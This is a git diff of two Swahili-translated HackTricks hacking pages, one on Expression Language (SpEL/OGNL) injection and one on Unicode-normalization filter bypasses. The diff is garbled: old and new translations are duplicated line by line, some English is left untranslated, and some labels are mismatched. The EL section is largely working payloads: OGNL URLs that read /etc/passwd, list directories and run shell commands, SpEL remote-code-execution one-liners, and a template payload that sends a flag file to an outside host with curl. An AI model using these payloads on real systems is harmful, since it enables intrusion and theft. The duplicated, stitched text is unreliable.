[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Taarifa Msingi
Lugha ya Ufafanuzi (EL) ni sehemu muhimu katika JavaEE kwa kuunganisha safu ya uwasilishaji (k.m., kurasa za wavuti) na mantiki ya programu (k.m., mabano yaliyosimamiwa), kuruhusu mwingiliano wao. Inatumika sana katika:
Lugha ya Uelekezaji (EL) ni muhimu katika JavaEE kwa kuhusisha safu ya uwasilishaji (k.m., kurasa za wavuti) na mantiki ya programu (k.m., mabano yaliyosimamiwa), kuruhusu mwingiliano wao. Inatumika sana katika:
- **JavaServer Faces (JSF)**: Kwa kufunga vipengele vya UI kwa data/tendo la nyuma.
- **JavaServer Pages (JSP)**: Kwa kupata na kubadilisha data ndani ya kurasa za JSP.
- **Contexts and Dependency Injection for Java EE (CDI)**: Kwa kurahisisha mwingiliano wa safu ya wavuti na mabano yaliyosimamiwa.
- **JavaServer Faces (JSF)**: Kwa kufunga vipengele vya UI kwa data/mambo ya nyuma.
- **JavaServer Pages (JSP)**: Kwa ufikiaji wa data na mabadiliko ndani ya kurasa za JSP.
- **Mizizi na Uingizaji wa Mitegemezi kwa Java EE (CDI)**: Kwa kurahisisha mwingiliano wa safu ya wavuti na mabano yaliyosimamiwa.
**Muktadha wa Matumizi**:
- **Spring Framework**: Inatumika katika moduli mbalimbali kama Usalama na Data.
- **Matumizi ya Kawaida**: Kupitia SpEL API na watengenezaji katika lugha zinazotegemea JVM kama Java, Kotlin, na Scala.
- **Spring Framework**: Kutumika katika moduli mbalimbali kama Usalama na Data.
- **Matumizi ya Kawaida**: Kupitia API ya SpEL na watengenezaji katika lugha zinazotegemea JVM kama Java, Kotlin, na Scala.
EL iko katika teknolojia za JavaEE, mazingira ya kujitegemea, na inatambulika kupitia nyongeza za faili za `.jsp` au `.jsf`, makosa ya safu, na maneno kama "Servlet" kwenye vichwa. Walakini, vipengele vyake na matumizi ya herufi fulani vinaweza kutegemea toleo.
EL iko katika teknolojia za JavaEE, mazingira ya kujitegemea, na inatambulika kupitia nyongeza za `.jsp` au `.jsf`, makosa ya stak na maneno kama "Servlet" kwenye vichwa. Hata hivyo, vipengele vyake na matumizi ya wahusika fulani vinaweza kutegemea toleo.
{% hint style="info" %}
Kulingana na **toleo la EL**, baadhi ya **vipengele** vinaweza kuwa **Hali ya Kuwasha** au **Hali ya Kuzima** na kawaida baadhi ya **herufi** zinaweza kuwa **zimezuiwa**.
Kulingana na **toleo la EL** baadhi ya **vipengele** vinaweza kuwa **Hewa** au **Walemavu** na kawaida baadhi ya **wahusika** wanaweza kuwa **hairuhusiwi**.
{% endhint %}
## Mfano Msingi
## Mfano wa Msingi
(Unaweza kupata mafunzo mengine ya kuvutia kuhusu EL katika [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/))
Pakua kutoka kwenye hazina ya [**Maven**](https://mvnrepository.com) faili za jar:
Pakua kutoka kwenye [**Hifadhi ya Maven**](https://mvnrepository.com) faili za jar:
* `commons-lang3-3.9.jar`
* `spring-core-5.2.1.RELEASE.jar`
* `commons-logging-1.2.jar`
* `spring-expression-5.2.1.RELEASE.jar`
Na uunde faili ya `Main.java` ifuatayo:
Na unda faili ya `Main.java` ifuatayo:
```java
import org.springframework.expression.Expression;
import org.springframework.expression.ExpressionParser;
@ -63,26 +77,26 @@ System.out.println(result);
}
}
```
Kisha kamilisha kodi (ikiwa huna `javac` imewekwa, weka `sudo apt install default-jdk`):
Kisha kamilisha msimbo (ikiwa huna `javac` imewekwa, weka `sudo apt install default-jdk`):
```java
javac -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main.java
```
Chukua programu na:
Chukua programu kwa:
```java
java -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main
Enter a String to evaluate:
{5*5}
[25]
```
Tafadhali angalia jinsi katika mfano uliopita neno `{5*5}` lilivyokuwa **limehakikiwa**.
Tafadhali angalia jinsi neno `{5*5}` lilivyokuwa **likihakikiwa**.
## **Mafunzo Yaliyojengwa Kulingana na CVE**
## **Mafunzo Yaliyojikita kwenye CVE**
Angalia katika **chapisho hili: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
Angalia kwenye **chapisho hili: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
## Payloads
## Mzigo wa Mabomu
### Hatua za Msingi
### Vitendo vya Msingi
```bash
#Basic string operations examples
{"a".toString()}
@ -106,7 +120,7 @@ Angalia katika **chapisho hili: [https://xvnpw.medium.com/hacking-spel-part-1-d2
{"".getClass().forName("java.util.Date").getMethods()[0].toString()}
[public boolean java.util.Date.equals(java.lang.Object)]
```
### Uchunguzi
### Kugundua
* Uchunguzi wa Burp
```bash
@ -124,30 +138,10 @@ https://www.example.url/?vulnerableParameter=PRE-${%23_memberAccess%3d%40ognl.Og
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40java.lang.Thread%40sleep(10000)%2c1%3f%23xx%3a%23request.toString}
```
### Kuingiza Faili Kijijini
Remote File Inclusion (RFI) ni mbinu ya kuingiza faili kutoka kwenye seva ya mbali katika tovuti ya lengo. Mbinu hii inatumika mara nyingi katika mazingira ambapo tovuti inaruhusu kuingiza faili kutoka kwa seva nyingine bila kufanya ukaguzi wa kutosha.
Kwa kawaida, mbinu hii inaweza kutumika kwa kuingiza faili za script ambazo zinaweza kutekelezwa kwenye seva ya lengo. Hii inaweza kusababisha matokeo mbaya kama vile kutekelezwa kwa msimbo mbaya, ufikiaji usioidhinishwa kwa data nyeti, au hata kuchukua udhibiti kamili wa seva.
Mara nyingi, RFI inaweza kufanyika kwa kutumia vigezo vya URL ambavyo havijasafishwa vizuri. Kwa mfano, ikiwa tovuti inaruhusu kuingiza faili kutoka kwa seva nyingine kupitia vigezo vya URL, mshambuliaji anaweza kuingiza URL ya faili ya script ambayo itatekelezwa kwenye seva ya lengo.
Kwa kuzuia RFI, ni muhimu kuhakikisha kuwa vigezo vya URL vinachujwa vizuri na kuhakikisha kuwa tovuti inafanya ukaguzi wa kutosha kabla ya kuingiza faili kutoka kwa seva nyingine. Pia, ni muhimu kudumisha toleo la hivi karibuni la programu na kufanya ukaguzi wa mara kwa mara wa usalama ili kugundua na kurekebisha mapungufu yoyote ambayo yanaweza kusababisha RFI.
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=new%20java.io.FileInputStream(%23wwww),%23qqqq=new%20java.lang.Long(%23wwww.length()),%23tttt=new%20byte[%23qqqq.intValue()],%23llll=%23pppp.read(%23tttt),%23pppp.close(),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(new+java.lang.String(%23tttt))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=%2fetc%2fpasswd
```
### Orodha ya Direktori
When conducting a web application penetration test, it is common to come across a directory listing vulnerability. This vulnerability occurs when the web server is configured to display the contents of a directory when no index file is present. This can expose sensitive information such as file names, directory structure, and even source code.
Wakati wa kufanya jaribio la uingizaji wa programu ya wavuti, ni kawaida kukutana na udhaifu wa orodha ya direktori. Udhaifu huu unatokea wakati seva ya wavuti imeundwa kuonyesha maudhui ya saraka wakati hakuna faili ya index inayopatikana. Hii inaweza kufichua habari nyeti kama majina ya faili, muundo wa saraka, na hata nambari ya chanzo.
To identify if a directory listing vulnerability exists, you can manually navigate to the directory in question and check if the contents are displayed. Alternatively, you can use automated tools like dirb or dirbuster to scan the target website for directories with listing enabled.
Ili kubaini ikiwa kuna udhaifu wa orodha ya direktori, unaweza kwa mkono kufikia saraka husika na kuangalia ikiwa maudhui yanaonyeshwa. Vinginevyo, unaweza kutumia zana za otomatiki kama dirb au dirbuster kutafuta wavuti ya lengo kwa saraka zilizo na orodha iliyoruhusiwa.
If a directory listing vulnerability is found, it is important to report it to the website owner or administrator so that appropriate measures can be taken to secure the server.
Ikiwa udhaifu wa orodha ya direktori unapatikana, ni muhimu kuripoti kwa mmiliki wa wavuti au msimamizi ili hatua sahihi ziweze kuchukuliwa ili kuhakikisha usalama wa seva.
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=new%20java.io.File(%23parameters.INJPARAM[0]),%23pppp=%23wwww.listFiles(),%23qqqq=@java.util.Arrays@toString(%23pppp),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23qqqq)%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=..
```
@ -169,15 +163,15 @@ https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlCo
# With HTMl entities injection inside the template
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>
```
* RCE **linux**
* URC **linux**
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="%2fbin%2fsh",%23ssss[1]="%2dc",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
* RCE **Windows** (haijajaribiwa)
* RCE **Windows** (haujajaribiwa)
```bash
https://www.example.url/?vulnerableParameter=${%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23wwww=@java.lang.Runtime@getRuntime(),%23ssss=new%20java.lang.String[3],%23ssss[0]="cmd",%23ssss[1]="%2fC",%23ssss[2]=%23parameters.INJPARAM[0],%23wwww.exec(%23ssss),%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.INJPARAM[0])%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString}&INJPARAM=touch%20/tmp/InjectedFile.txt
```
* **Zaidi ya RCE**
* **Udhibiti wa Kijijini Zaidi**
```java
// Common RCE payloads
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>)
@ -213,31 +207,23 @@ T(java.lang.Runtime).getRuntime().exec('ping my-domain.com')
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("cmd /c dir").getInputStream())
''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')
```
### Ukaguzi wa mazingira
### Kuchunguza mazingira
* `applicationScope` - mazingira ya kipekee ya programu
* `requestScope` - mazingira ya ombi
* `initParam` - mazingira ya kuanzisha programu
* `sessionScope` - mazingira ya kikao
* `param.X` - thamani ya param ambapo X ni jina la parameter ya http
* `applicationScope` - mazingira ya kimataifa ya programu
* `requestScope` - variables za ombi
* `initParam` - variables za kuanzisha programu
* `sessionScope` - variables za kikao
* `param.X` - thamani ya param ambapo X ni jina la parameta ya http
Utahitaji kubadilisha aina ya mazingira haya kuwa String kama:
Utahitaji kubadilisha variables hizi kuwa String kama:
```bash
${sessionScope.toString()}
```
#### Mfano wa Kupita kwa Uthibitishaji
```java
${7*7}
```
This is a simple example of an expression that can be injected into a server-side template. In this case, the expression `${7*7}` will be evaluated by the server and the result, `49`, will be rendered in the output.
Hii ni mfano rahisi wa kielelezo kinachoweza kuingizwa kwenye kigeuzi cha upande wa seva. Katika kesi hii, kielelezo `${7*7}` kitahesabiwa na seva na matokeo, `49`, yataonyeshwa kwenye matokeo.
#### Mfano wa kukiuka idhini
```bash
${pageContext.request.getSession().setAttribute("admin", true)}
```
Programu inaweza pia kutumia variables maalum kama:
Programu inaweza pia kutumia mabadiliko ya desturi kama:
```bash
${user}
${password}
@ -254,14 +240,26 @@ Angalia [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https:
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Je! Unafanya kazi katika kampuni ya **usalama wa mtandao**? Je! Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**swagi rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

View file

@ -1,4 +1,4 @@
# Ufananishaji wa Unicode
# Kusawazisha Unicode
<details>
@ -6,38 +6,52 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
**Hii ni muhtasari wa:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Angalia kwa undani zaidi (picha zilizochukuliwa kutoka hapo).
## WhiteIntel
## Kuelewa Unicode na Ufananuzi
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
Ufananuzi wa Unicode ni mchakato unaohakikisha uwakilishi tofauti wa kibitibiti wa wahusika unastandadishwa kwa thamani sawa ya kibitibiti. Mchakato huu ni muhimu katika kushughulikia herufi katika programu na usindikaji wa data. Kiwango cha Unicode hufafanua aina mbili za usawa wa wahusika:
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
**Hii ni muhtasari wa:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Angalia kwa undani zaidi (picha zimetolewa hapo).
## Kuelewa Unicode na Usawazishaji
Usawazishaji wa Unicode ni mchakato unaohakikisha uwakilishi tofauti wa binary wa wahusika unastandadishwa kwa thamani sawa ya binary. Mchakato huu ni muhimu katika kushughulikia herufi katika programu na usindikaji wa data. Kiwango cha Unicode hufafanua aina mbili za usawa wa wahusika:
1. **Usawa wa Kanoni**: Wahusika wanachukuliwa kuwa sawa kwa kanoni ikiwa wanaonekana na kumaanisha sawa wakati wa kuchapishwa au kuonyeshwa.
2. **Usawa wa Ulinganifu**: Aina dhaifu ya usawa ambapo wahusika wanaweza kuwakilisha kibitibiti kimoja cha kimaanisha lakini wanaweza kuonyeshwa tofauti.
2. **Usawa wa Ulinganifu**: Aina dhaifu ya usawa ambapo wahusika wanaweza kuwakilisha wahusika sawa wa kimaarufu lakini wanaweza kuonyeshwa tofauti.
Kuna **algoritimu nne za ufananuzi wa Unicode**: NFC, NFD, NFKC, na NFKD. Kila algoritimu hutumia mbinu tofauti za kanoni na ufananuzi wa uwezo. Kwa uelewa zaidi, unaweza kuchunguza mbinu hizi kwenye [Unicode.org](https://unicode.org/).
Kuna **algoritimu nne za usawazishaji wa Unicode**: NFC, NFD, NFKC, na NFKD. Kila algoritimu hutumia mbinu tofauti za usawazishaji wa kanoni na ufanani. Kwa uelewa zaidi, unaweza kuchunguza mbinu hizi kwenye [Unicode.org](https://unicode.org/).
### Mambo Muhimu kuhusu Ufananuzi wa Unicode
Kuelewa uandishi wa Unicode ni muhimu, hasa wakati wa kushughulikia masuala ya kuingiliana kati ya mifumo au lugha tofauti. Hapa kuna mambo muhimu:
Kuelewa ufananuzi wa Unicode ni muhimu, hasa unaposhughulikia masuala ya kuingiliana kati ya mifumo au lugha tofauti. Hapa kuna mambo muhimu:
* **Pointi za Kanuni na Wahusika**: Katika Unicode, kila herufi au alama imepewa thamani ya nambari inayoitwa "pointi ya kanuni".
* **Uwakilishi wa Bayti**: Pointi ya kanuni (au herufi) inawakilishwa na bayti moja au zaidi kumbukani. Kwa mfano, herufi za LATIN-1 (zinazotumiwa sana katika nchi zinazozungumza Kiingereza) zinawakilishwa kwa kutumia bayti moja. Walakini, lugha zenye seti kubwa ya wahusika zinahitaji bayti zaidi kwa uwakilishi.
* **Ukodishaji**: Kauli hii inahusu jinsi wahusika wanavyobadilishwa kuwa mfululizo wa bayti. UTF-8 ni kiwango cha ukodishaji ambapo herufi za ASCII zinawakilishwa kwa kutumia bayti moja, na hadi bayti nne kwa wahusika wengine.
* **Usindikaji wa Data**: Mifumo inayosindika data lazima iwe na ufahamu wa ukodishaji unaotumiwa ili kubadilisha kwa usahihi mfululizo wa bayti kuwa wahusika.
* **Toleo za UTF**: Mbali na UTF-8, kuna viwango vingine vya ukodishaji kama UTF-16 (ikitumia angalau bayti 2, hadi 4) na UTF-32 (ikitumia bayti 4 kwa wahusika wote).
* **Uwakilishi wa Bayti**: Pointi ya kanuni (au herufi) inawakilishwa na bayti moja au zaidi kwenye kumbukumbu. Kwa mfano, herufi za LATIN-1 (zinazotumiwa sana katika nchi zinazozungumza Kiingereza) zinawakilishwa kwa kutumia bayti moja. Walakini, lugha zenye seti kubwa ya wahusika zinahitaji bayti zaidi kwa uwakilishi.
* **Ufananuzi**: Kauli hii inahusu jinsi wahusika wanavyobadilishwa kuwa mfululizo wa bayti. UTF-8 ni kiwango cha kawaida cha ufananuzi ambapo herufi za ASCII zinawakilishwa kwa kutumia bayti moja, na hadi bayti nne kwa wahusika wengine.
* **Usindikaji wa Data**: Mifumo inayosindika data lazima iwe na ufahamu wa ufananuzi unaotumiwa ili kubadilisha mfululizo wa bayti kuwa wahusika.
* **Toleo za UTF**: Mbali na UTF-8, kuna viwango vingine vya ufananuzi kama UTF-16 (ikiwa na angalau bayti 2, hadi 4) na UTF-32 (ikiwa na bayti 4 kwa wahusika wote).
Ni muhimu kufahamu dhana hizi ili kushughulikia kwa ufanisi na kupunguza masuala yanayoweza kutokea kutokana na utata wa Unicode na njia zake mbalimbali za ukodishaji.
Ni muhimu kuelewa dhana hizi ili kushughulikia na kupunguza masuala yanayoweza kutokea kutokana na utata wa Unicode na njia zake mbalimbali za ufananuzi.
Mfano wa jinsi Unicode inavyonormalisha bayti mbili tofauti zinazowakilisha herufi moja sawa:
Mfano wa jinsi Unicode inavyosawazisha bayti mbili tofauti zinazowakilisha herufi sawa:
```python
unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "chlo\u00e9")
```
@ -45,17 +59,17 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
### Kugundua
Ikiwa unaweza kupata ndani ya programu-jalizi ya wavuti thamani ambayo inarudishwa, unaweza kujaribu kutuma **'KELVIN SIGN' (U+0212A)** ambayo **inahamisha kuwa "K"** (unaweza kutuma kama `%e2%84%aa`). **Ikiwa "K" inarudishwa**, basi, aina fulani ya **kawaida ya Unicode** inafanywa.
Ikiwa unaweza kupata ndani ya programu-jalizi ya wavuti thamani ambayo inarudiwa, unaweza kujaribu kutuma **'KELVIN SIGN' (U+0212A)** ambayo **inahitaji "K"** (unaweza kutuma kama `%e2%84%aa`). **Ikiwa "K" inarudiwa**, basi, aina fulani ya **kawaida ya Unicode** inafanywa.
**Mfano mwingine**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` baada ya **unicode** ni `Leonishan`.
## **Mifano ya Kudhoofika**
### **Kiwango cha Kufilisika cha SQL Injection**
### **Kizuizi cha Uvujaji wa SQL Injection**
Fikiria ukurasa wa wavuti ambao unatumia herufi `'` kuunda maswali ya SQL na mchango wa mtumiaji. Wavuti hii, kama hatua ya usalama, **inafuta** matukio yote ya herufi **`'`** kutoka kwa mchango wa mtumiaji, lakini **baada ya kufuta** na **kabla ya uundaji** wa swali, ina **kawaida** kutumia **Unicode** mchango wa mtumiaji.
Fikiria ukurasa wa wavuti unatumia herufi `'` kuunda maswali ya SQL na mchango wa mtumiaji. Wavuti hii, kama hatua ya usalama, **inafuta** matukio yote ya herufi **`'`** kutoka kwa mchango wa mtumiaji, lakini **baada ya kufuta** na **kabla ya uundaji** wa swali, inafanya **kawaida** kutumia **Unicode** mchango wa mtumiaji.
Kisha, mtumiaji mwenye nia mbaya anaweza kuingiza herufi tofauti ya Unicode inayolingana na `' (0x27)` kama `%ef%bc%87`, wakati mchango unapohamishwa, alama moja ya nukta inaundwa na **kutokuwa na usalama wa SQLInjection** unaonekana:
Kisha, mtumiaji mwenye nia mbaya anaweza kuingiza herufi tofauti ya Unicode inayolingana na `' (0x27)` kama `%ef%bc%87`, wakati mchango unapopata kawaida, alama ya nukta moja inaundwa na **kutokuwa na usalama wa SQLInjection** unaonekana:
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
@ -95,13 +109,13 @@ Unaweza kutumia moja ya herufi zifuatazo kudanganya programu ya wavuti na kutumi
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
Tambua kwamba kwa mfano herufi ya kwanza ya Unicode inayopendekezwa inaweza kutumwa kama: `%e2%89%ae` au kama `%u226e`
Tambua kwamba kwa mfano herufi ya kwanza ya Unicode inaweza kutumwa kama: `%e2%89%ae` au kama `%u226e`
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1) (1).png>)
### Fuzzing Regexes
Wakati seva ya nyuma ina **angalia kuingia kwa mtumiaji na regex**, inaweza kuwa inawezekana kwamba **kuingia** ina **kawaida** kwa **regex** lakini **sio** kwa mahali inapotumiwa. Kwa mfano, katika Uelekezaji wa Wazi au SSRF regex inaweza kuwa **kawaida URL iliyotumwa** lakini kisha **kuitumia kama ilivyo**.
Wakati seva ya nyuma ina **angalia kuingia kwa mtumiaji na regex**, inaweza kuwa inawezekana kwamba **kuingia** ina **kawaida** kwa **regex** lakini **sio** kwa mahali ambapo inatumika. Kwa mfano, katika Uelekezaji wa Wazi au SSRF regex inaweza kuwa **kawaida URL iliyotumwa** lakini kisha **kuiweka kama ilivyo**.
Zana [**recollapse**](https://github.com/0xacb/recollapse) inaruhusu **kuzalisha mabadiliko ya kuingia** kufanya fuzzing kwa seva ya nyuma. Kwa habari zaidi angalia **github** na hii [**chapisho**](https://0xacb.com/2022/11/21/recollapse/).
@ -111,16 +125,28 @@ Zana [**recollapse**](https://github.com/0xacb/recollapse) inaruhusu **kuzalisha
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
